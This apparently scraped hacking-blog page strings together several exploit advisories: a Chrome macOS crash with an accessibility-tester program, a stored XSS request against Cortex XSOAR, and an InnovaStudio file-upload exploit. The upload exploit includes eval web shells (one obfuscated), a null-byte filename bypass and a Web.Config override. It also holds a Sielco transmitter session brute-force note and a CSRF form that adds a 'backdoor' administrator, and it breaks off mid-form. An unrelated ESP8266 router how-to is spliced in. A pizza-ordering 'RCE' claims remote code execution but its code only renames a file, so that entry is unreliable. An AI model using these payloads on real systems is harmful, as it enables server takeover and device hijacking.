## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm
Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
110.0.5481.100 (Official Build) (x86_64)
108.0.5359.124 (Official Build) (x86_64)
108.0.5359.98 (Official Build) (x86_64)
Fixed version: 112.0.5615.49 (Official Build) (x86_64)
Summary: Google Chrome browser is a free web browser used for
accessing the internet and running web-based applications. The
Google Chrome browser is based on the open source Chromium web
browser project. Google released Chrome in 2008 and issues several
updates a year.
Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
tabs on macOS.
Commit fix:
"The original cl landed many months ago, but
chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
is the only change that didn't revert cleanly."
macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
Implements accessibility hit testing for RemoteCocoa so that Hover Text
and VoiceOver mouse mode can read the accessible objects under the
user's pointer. Cross-process plumbing was needed because RemoteCocoa
bridges to native controls in a separate app shim process and must
report accessibility trees from the browser process via the
undocumented NSAccessibilityRemoteUIElement mechanism.
This CL does the following:
1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
in the browser process. This enables the browser process to accept
redirected accessibilityHitTest calls to the object corresponding to
any NSAccessibilityRemoteUIElement returned by the original
accessibilityHitTest at the app shim process.
2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
accessibilityHitTest to have a custom implementation with
NSAccessibilityRemoteUIElement support so that custom window
controls can be found. Additionally, adjusts the BrowserView bounds
so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
support view targeting) can return controls in the web app frame
toolbar.
3. (For Web Content) Implements RenderWidgetHostViewCocoa's
accessibilityHitTest for instances in the app shim to return a
NSAccessibilityRemoteUIElement corresponding to their counterparts
in the browser process so that web content objects can be found.
Tested on: macOS 12.6.1 (Monterey)
macOS 13.3.1 (Ventura)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
08.12.2022
--
UI PoC:
-------
1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.
Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
=============
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <iostream>
#include <sstream>
#include <vector>
__BEGIN_DECLS
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS
std::ostream& bold_on(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[1m";
}
return os;
}
std::ostream& bold_off(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[0m";
}
return os;
}
std::string from_cfstr(CFTypeRef cf_ref)
{
if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
{
const auto cf_str = static_cast<CFStringRef>(cf_ref);
const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
auto result = std::string(max_length, '\0');
if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8))
{
if (const auto pos = result.find('\0'); pos != std::string::npos)
{
result.resize(pos);
}
return result;
}
}
return {};
}
std::string ax_element_id(AXUIElementRef value)
{
// AX element cache - AX elements are backed by CFData
// (referring to 'remote' AX objects) and this data is
// 'stable' across 'volatile' instances of AXUIElement.
// 'hash and equality' of AX elements are based on this
// data and therefore, we can use AXUIElement objects as
// 'keys' in a dictionary with values, identifying these
// objects (uniquely).
const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
auto ax_id = CFDictionaryGetValue(ax_elements, value);
if (ax_id == nullptr)
{
if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
{
if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
{
CFDictionarySetValue(ax_elements, value, uuid_s);
CFRelease(uuid_s);
}
CFRelease(uuid);
}
ax_id = CFDictionaryGetValue(ax_elements, value);
}
return from_cfstr(ax_id);
}
template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name)
{
if (e != nullptr)
{
auto ref = T{};
if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
{
return ref;
}
}
return nullptr;
}
// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth)
{
const auto max_depth = 10;
if (depth > max_depth)
{
return;
}
const auto indent = [&]()
{
for (auto x = 0; x < depth; x++)
{
std::cout << " ";
}
};
auto wid = CGWindowID{};
if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
{
wid = 0;
}
indent();
const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
std::endl;
if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute))
{
for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
{
const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
ax_traverse(element, depth + 1);
}
CFRelease(children);
}
}
int main(int argc, char* const argv[])
{
auto pid = 0;
if (argc > 1)
{
if (!AXIsProcessTrusted())
{
std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
exit(1); // NOLINT
}
// NOLINTNEXTLINE
pid = std::stoi(argv[1]);
}
else
{
std::cerr << "usage: axtester <pid>" << std::endl;
exit(1); // NOLINT
}
if (const auto app = AXUIElementCreateApplication(pid))
{
auto observer = AXObserverRef{};
auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
{
auto myapp = (__AXUIElement*)(ctx);
auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
std::cout << "Hint: " << hint << std::endl;
ax_traverse(myapp, 0);
}, &observer);
if (kAXErrorSuccess != ret)
{
std::cerr << "Fail to create observer" << std::endl;
return -1;
}
std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
CFRunLoopRun();
}
return 0;
}
--codeaibot explains--
This is a C++ program that uses the Accessibility API (AX) provided
by macOS to traverse the user interface of a running application and
print out information about the accessibility elements that it finds.
The program takes a single argument, which is the process ID (PID) of
the application to examine. If no argument is provided, the program
displays a usage message and exits.
The main() function first checks if the Terminal app has been granted
accessibility privileges by calling the AXIsProcessTrusted() function.
If it hasn't, the program displays an error message and exits.
If the Terminal app has been granted accessibility privileges, the program
creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
function, passing in the PID as an argument.
The ax_traverse() function is then called with the root accessibility
element of the application as an argument. This function recursively
traverses the accessibility tree of the application, printing out
information about each element it encounters.
The program also defines several helper functions for working with Core
Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
as well as some functions for printing formatted output to the console
(bold_on() and bold_off()).
-- / --
As this issue is not a security issue nor results in security consequences,
this report is not eligible for a VRP reward.
++
Thank you Amy!
--
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113594
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent javascript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
Regards,
Omur UGUR
>
# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
# #
# ASP version, in i_upload_object_FSO.asp, line 234 #
# #
# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
# #
##################################################################################################
||==============================================================================||
|| ((((1)))) ||
|| ||
|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
" "
==================================================================================================
***
||================================================================================||
|| ((((2)))) ||
|| ||
|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
|| ||
||================================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" >>> filename="shell.asp%00asp.txt" <<< "
" "
" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
" "
" or "
" "
" CTRL+Shift+U "
" "
" SEND! "
" "
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
" "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
" "
==================================================================================================
***
||==============================================================================||
|| ((((3)))) ||
|| ||
|| ...:::NO WRITE PERMISSION!:::... ||
|| ||
|| ...:::Directory Traversal:::... ||
|| ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0600 ] "
" "
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
" "
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
" "
" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
" "
" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
" "
" "
##################################################################################################
##########################################################################################################################################################
# #
# What is the App_Data Folder useful? #
# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory. #
# Because it's a private directory, the IIS server hides it for security reasons. #
# Now, we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
# So the directory will be public and it will be able to respond to external queries and run a shell. #
# #
##########################################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
<configuration>
<system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
<requestFiltering>
<hiddenSegments>
<clear />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
" "
" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
" "
==================================================================================================
# Now we will upload your shell to the directory where we made ByPass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
" "
" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
" "
==========================================================================================================================================
" "
" So what can we do if no directory on the site has write permission? "
" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability, "
" Sometimes also it can be a "Service Permissions" vulnerability. "
" Sometimes also it can be a "Binary Permissions " vulnerability. "
" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
" Our limits are as much as our imagination... "
" *** 0DAY *** "
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
" And then upload our shell file to the server by bypassing it. "
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
" "
==========================================================================================================================================
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell,
this is because he can access the upload function from the
administrator account.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```mysql
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
## Proof and Exploit:
[href](https://streamable.com/szb9qy)
## Time spend:
00:45:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
I turned the board worth more than ten yuan into a router.
List
esp8266 board one software ESP8266Flasher 
Instructions:
Download the firmware that is flashed first, esp8266 wifi relay firmware
In the firmware,0x00000.bin is written to the address0x00000, and0x10000.bin file is written to the address0x10000.
As shown in the figure
After the flashing is completed, MYAP's ssid will appear
Access after connection 192.168.4.1
Configure 
Internet speed test 
Advantages and disadvantages Advantages: Small and convenient, simple and practical, the most important thing is cheap~ Disadvantages: Low efficiency, easy to disconnect, and slow network speed.
## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The Cookie session ID 'id' is of an insufficient length and
can be exploited by brute force, which may allow a remote attacker
to obtain a valid session, bypass authentication and manipulate
the transmitter.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5758
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php
26.01.2023
--
# Session values (len=5)
Cookie: id=44189
Cookie: id=37692
Cookie: id=+6638
Cookie: id=+3077
...
...
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
## Exploit Author: LiquidWorm
Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php
26.01.2023
-->
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="" />
<input type="hidden" name="user3" value="backdoor" />
<input type="hidden" name="pwd3" value="backdoor123" />
<input type="hidden" name="pwd3bis" value="backdoor123" />
